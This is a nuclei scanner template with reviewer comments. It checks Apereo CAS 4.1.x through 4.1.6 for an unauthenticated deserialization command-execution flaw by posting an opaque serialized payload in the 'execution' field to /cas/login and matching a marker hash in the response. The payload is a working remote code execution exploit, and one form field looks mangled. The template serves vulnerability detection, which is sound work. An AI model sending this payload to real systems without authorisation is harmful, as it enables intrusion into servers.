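# Template identity and metadata. The nesting under `info:` is restored here;
# with every key at column 0 the metadata fields would read as top-level keys.
# The name below reads, in English:
# "Apereo 4.1.x through 4.1.6 deserialization command execution".
id: Apereo-Cas-rce

info:
  name: Apereo 4.1.X~4.1.6版本反序列化命令执行
  author: Str1am
  # NOTE(review): the request in this template carries no session or
  # credentials that authenticate it, so the issue appears to be reachable
  # before login; command execution of that kind is usually rated `critical`.
  # `high` is kept as the author set it.
  severity: high
  description: >-
    Checks Apereo CAS 4.1.x (up to and including 4.1.6, per the template name)
    for the Java deserialization command-execution issue by posting a fixed
    `execution` value to /cas/login and looking for a marker string in the
    response body.
  tags: Apereo,Cas,rce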
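# One raw POST to the CAS login endpoint. The `execution` form field holds a
# fixed, opaque blob (its contents cannot be read from this file); presumably
# this is the field CAS uses for its serialized webflow state. The check
# passes when the response is 200 and the body shows the marker string below.
#
# Triage: a match is evidence that the server processed the blob, so treat it
# as confirmed code execution rather than a version fingerprint. Per the
# template name the affected range is 4.1.x up to 4.1.6; upgrading past that
# range is the fix. Public advisories for this issue also call for
# deployment-specific webflow encryption/signing keys (confirm against the
# vendor advisory).
#
# Layout restored from a flattened copy: nesting, the blank line between the
# HTTP headers and the form body, and the body itself, which had been wrapped
# in the middle of a `%2B` escape and is rejoined onto one line.
#
# NOTE(review): near the end of the body, `submit<=LT-...` is kept exactly as
# found. The `<` looks like a decoded `&lt` entity, i.e. the original was
# probably `&lt=` (the login-ticket form field); verify against the upstream
# file. `password`, the login ticket and `username` are fixed filler values.
#
# NOTE(review): newer nuclei releases name this section `http:`; `requests:`
# is kept as the author wrote it.
requests:
  - raw:
      - |
        POST /cas/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        execution=7b951c2a-e78f-4286-95fe-970782352a84_AAAAIgAAABByzX2CboJrokE9fWsjmpIfAAAABmFlczEyOD2qXDuzMCkfiJJ8HeHT2H6viiIlis3R%0D%0AiWWuxz3YPz%2FvvliioTYKpjOV6lXkIotX%2B1a2BCc4tMGGt1TftfMxODZWE4PDkeVLlBJOK4gRqem9%0D%0A1dp1Gs9D1zcQ3fXDNkktLoIujk6Fbl%2Bacugm1fSV3u4KsdIUBvE3LR9HlQcZ0JwRaQPpgD%2B3kMLl%0D%0Ari%2FYaiecyMsEKm6F3HRidykv%2FeQVS3pPGnt0i%2F%2BSsSJROL6HBpB4GYSJgENMq9LIvP7SWtmy0yK%2B%0D%0AiPltKVCDwj2LkSnORmDyAfm7szY5Akspbl4t%2FRDYji6AhGtiZzcYzEjJJjMZMKd%2FijIhy20KEc2m%0D%0Ab21YnIOm1YJ8uSYvTSJAhISVSEFjmigt4EfQbyIv1cL3%2FYJabJI3E9wzyZCX5rNE4J5i14lAY3Cz%0D%0AZC%2F4pxOahl%2FyV9v2ZwX%2FjlYQN2FVNvOzt0pewk0g9HK9CgN5EcebyEVpbgCnfuizX916B8P37ru1%0D%0ABq613dkyAP29EEiFVBpMwqe0sg0%2Ba%2Fm4u3yi6UoXZ%2FnWWrJvxOUrD%2BLEGGfI8ksGxdiZJlztydr8%0D%0AjMkAG%2BAHP4GbmStnoQh3iEdyrLNWpO7RofNo3qqwkb5lMZhRH1jW3Cmqvm8oOT%2Bbl9T7gezAIV1V%0D%0ALKaBtI%2F%2Fn20fXoB5VB%2FyNYtjoiX2BMhB5Vtkqj2XXsMkjOGBznYi53sqXTLDLS3BQ6crQdqWo02E%0D%0ApFBLdcsWGM1AqS9%2BENCpV62bqEqIb%2FcJnlGIuV%2FylX%2FEOpmlP74RqbEh1%2Br%2BuPTyDD8BBY7LOxg3%0D%0AbKazlaxbLVnR2gcxYmpqh6NrxqHgb3f3Hq%2B9hwwx%2BYgYv%2BhbmtfjsOZDJodoQN36zAZ%2BXfAUuvM2%0D%0AWXVU38iElGFWq3Enem7eeUxhqghDvPjSepYVr%2BrUxCqFDBij12VKBS5DUdE0AbTeQoLHXMT4Kv2f%0D%0AXEdYmpu2JaYhNezYpBI74bvH6swD9v%2BlfTMLUdn6UyFkqRH7trNIAZP%2F%2BlLnMjLVyvMWUZ8w3DUs%0D%0A9qBgtRAJqeSxEMweB0Ap1d65p%2BJ0txPt8OxL8dUtugChxO%2Fne9TynrFQ9A%2BgfRIP%2BlcIljwrA1X%2F%0D%0Aw2JE2JiLHPF%2FR%2BnWyG62qdxl8SZCyVkIFmOIsLVfuABhYmsB0Z6EX85Wb84MakYSVn0dR1UTmxwq%0D%0Ayd0PH0k1RxiJXGKmYm9R7Lviw%2B2otUE71XaQrbW46eVJcrK%2Fr8%2B3Gd8l6tb7WgD5IPCct%2FvIlydH%0D%0AbRsGQ%2FsqwPtjit1pHTrSTETS40VvEf2aesJdxRk07HNU7D2msg82Q39ReXpuDkCZbqBnuKQoxtN3%0D%0A1DMWhFvWU%2BeG2XuKSlPzC7pQ5EsYbvkEHSRLloFAFxWmzSbMliwfVtyXFZTyN28Z6WNK%2Bn5cN%2FUd%0D%0AKLuyZxGMk4k9ZJozHfWivu3b8%2FtM1UzHMiLPwvUg8rNgLdJzOQeCUu03OBahpwCZowWis1NLYf4J%0D%0A3bqDWk3pQTRLo5hMdxjc%2Ft2kTe7ED5omWrnJNXqp%2B3iRP3%2FXdF0UKpgJaphqQCEGV9OJ3bvPZE%2Bw%0D%0AL20KgEKrbnrELepw8BE%2BHHpczngA0uGdUC%2Bbg0fuyBChrb6t9eeKRP9kI%2B%2FI0t7hY97WP4uopeJU%0D%0AGY2f%2Fmi0mU2mrBwBORkme%2B8GDx1cdBwV0gCaSYKvot%2BrF0W99O05mkADWKJ7rBBV21Tqc5NjL0cr%0D%0AGapMc8%2BznbG5us8eWZUAlXEAjRH9VGhahnC05tchqkOrqbawCpGHvYpbNchDH68kiKheGnI4HYTF%0D%0A6ZKQH6HyVII57DSZVALO%2BaD1bwxqbosWGF1YzcjQrmpFhnRbIgF1n1UTkJ6WSveI9TaF%2Fs%2FnZpVj%0D%0ArSyoFVnqXoG%2FObEkIonRLVTAjv7JbCmJsTaDu0JzsZ2J7uuwS9FpEnAB%2BfO40eBRZnBGiBIgUAbm%0D%0AiVen1oaWWyUT%2FhyKUYvMhHtMAF%2F5GKpqnVV0YoeDYFs0MIIotNqtza574Y1M8Ae5PTHxI5jZrAy3%0D%0AIwvvMHBzRC8C%2F1h1lWoqj7lU4Mr4mLVCsKnsmT9K9BNn3CsfhvKIBDA4VPRSUwIMdQrkzHWmAsZ3%0D%0AFpLec5RFnzHYe31pcELfSKBnmnBbQkiL6aVgPGlEvUQA5faPDY%2BKZ40OEH%2FmNaVxlQHVqKIz26HI%0D%0AFJQ5TWwVOLRJsIDVEEaX%2Bjqr7YU%2B9wqag9RLL72dYl7sAhJ12zh56W82yQ2WvOJALkjJqHy%2FiC10%0D%0A2%2BXyPd67KghcyGBaOXQNvDon9Ie2fXhwvOxh5OijNI4VR9aqNbMGE%2FWqw962pRkBrxIPSkjJvxJX%0D%0AZURhGoSD%2FopB33YK503rpWAvfZqa0p%2F2hMlr%2BdxpIajFuN4lXhLruYRCoj4aLkkLopAV%2FAttlxWK%0D%0Aq6JWN71Fe3PzOxN0Tpp3WQ51OGGup%2B%2Bvhu2Re%2BVSXquAROOxjIxZ83o92Gxid4rq5t7opYq05wN6%0D%0A2MaHbXYBXRNuh7LPRq%2FELJ0hf6wmvrQWyW6GlHTK4YIWo9M2zFkTpQcbwHWtO4rllnfZ%2FLSD%2BDME%0D%0AlfHIGPPQ%2Fa8CO6%2FKz0RhUD1ZFZICEzZVnUTQvdy76IpztpRS6C5j%2FFuKKlI0YRC8EkQHtqFdqsdT%0D%0AV1EWgND%2BpNwMoA0aXQsDLNLdUngLsmhYsMK5Vex2o3DTVbZNS1UeDiQ%2FfaoPddtUYD40lmTT9zYt%0D%0AUJHY6e9ASbrvJKmnjQVN5FN5hJivx5g5LYJxZ9nRNNO%2BmiaiwtJvxPkc8c%2BxJZmzzo7cEUxrCnn7%0D%0AoS7oTTEC8k6U57TUadxlMui383uDpdIqkC2YT2tFDUlbpxQLLUFCHyN3iRw7Y7IU5KRQCYgkWz8X%0D%0AKIqyJhIR7gEV3AtG%2FUj5ZE5J2mRv%2F%2F%2Buq35KaWeWczRjkBMK9FHeC5eujArEJmiSyVFIvHOcAwgN%0D%0AF0n4jD7kcRJIdEEL1EcyJo%2B9q5Dg3xJThcsywcddLX48Nqa7KSWGsg3kawaNm4Dq8Vyp&password=Test1234&_eventId=submit<=LT-215706-O4ejY5ldDQpHMB9WdQbe0trNaM28Wf-cas01.example.org&username=13222233322
    # Both matchers below must succeed for the template to report a hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # 21232f297a57a5a743894a0e4a801fc3 is the MD5 digest of the string
      # "admin"; presumably the blob makes the server emit it (not confirmable
      # from the opaque body). It is a very common hash value, so any page
      # that merely contains it would satisfy this matcher; the status check
      # is the only other condition narrowing the result.
      - type: word
        words:
          - "21232f297a57a5a743894a0e4a801fc3"
        part: body
        # Only one word is listed, so `and` versus the default makes no
        # difference here; it matters only if more words are added.
        condition: and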